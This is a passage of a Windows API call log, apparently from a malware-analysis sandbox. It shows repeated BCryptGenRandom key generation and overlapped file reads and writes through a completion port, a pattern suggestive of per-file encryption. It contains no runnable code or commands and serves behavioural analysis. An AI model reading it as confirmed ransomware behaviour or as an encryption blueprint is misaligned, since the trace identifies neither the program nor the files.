nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.271] CloseHandle (hObject=0x3ac) returned 1 [0087.271] free (_Block=0x3df0008) [0087.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0087.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0087.284] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.284] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.284] free (_Block=0x1ff1e60) [0087.284] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.284] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.285] free (_Block=0x1ff1e60) [0087.285] free (_Block=0x1ff1930) [0087.285] free (_Block=0x77d800) [0087.285] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0087.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0087.306] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.306] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.306] free (_Block=0x77d800) [0087.306] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0087.306] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0087.307] free (_Block=0x2031ed0) [0087.307] free (_Block=0x2031fe0) [0087.307] free (_Block=0x77d908) [0087.307] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0087.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0087.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0087.342] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.342] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.342] free (_Block=0x77d800) [0087.342] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.342] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.343] free (_Block=0x1ff1930) [0087.343] free (_Block=0x1ff1a40) [0087.343] free (_Block=0x77d908) [0087.343] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.374] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xd86, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.389] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0xd3e, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0087.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.414] ReadFile (in: hFile=0x3c4, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0xc8e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0087.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0087.451] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.452] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.452] free (_Block=0x1ff1e60) [0087.452] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.452] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.452] free (_Block=0x1ff1e60) [0087.452] free (_Block=0x1ff1930) [0087.452] free (_Block=0x77d800) [0087.452] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.556] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.580] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.596] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 0x0 [0087.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.610] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0087.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.632] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0087.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0087.883] CloseHandle (hObject=0x3c0) returned 1 [0087.883] free (_Block=0x2031ed0) [0087.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0088.284] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0088.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0088.300] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x6d40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0088.310] WriteFile (in: hFile=0x3c8, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0088.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0088.318] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df015c, nNumberOfBytesToRead=0xee2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0088.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0088.321] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xeeb, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0089.379] CloseHandle (hObject=0x3c4) returned 1 [0089.380] free (_Block=0x3d70048) [0089.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0089.382] CloseHandle (hObject=0x3b8) returned 1 [0089.382] free (_Block=0x1ff1e60) [0089.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0089.975] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0090.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0090.025] CloseHandle (hObject=0x3c0) returned 1 [0090.025] free (_Block=0x2031ed0) [0090.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0090.027] CloseHandle (hObject=0x3b8) returned 1 [0090.027] free (_Block=0x1ff1e60) [0090.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0090.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0090.883] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.885] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0090.886] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0090.886] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0090.886] free (_Block=0x1ff1e60) [0090.886] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0090.886] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0090.886] free (_Block=0x1ff1e60) [0090.886] free (_Block=0x3db01c8) [0090.886] free (_Block=0x3db00b8) [0090.886] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0090.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0090.894] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0090.895] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.038] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.069] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.102] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.156] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.226] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.307] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.362] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.424] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x23d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0091.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.425] CloseHandle (hObject=0x4b4) returned 1 [0091.428] free (_Block=0x3d70048) [0091.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0091.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0091.786] calloc (_Count=0x40, _Size=0x4) returned 0x2071008 [0091.786] calloc (_Count=0x41, _Size=0x4) returned 0x2071110 [0091.786] free (_Block=0x2071008) [0091.786] calloc (_Count=0x41, _Size=0x4) returned 0x2071220 [0091.786] calloc (_Count=0x82, _Size=0x4) returned 0x2071330 [0091.786] free (_Block=0x2071220) [0091.786] free (_Block=0x2071330) [0091.787] free (_Block=0x2071110) [0091.787] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.828] ReadFile (in: hFile=0x1198, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x1928, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0091.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0091.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.878] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0091.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 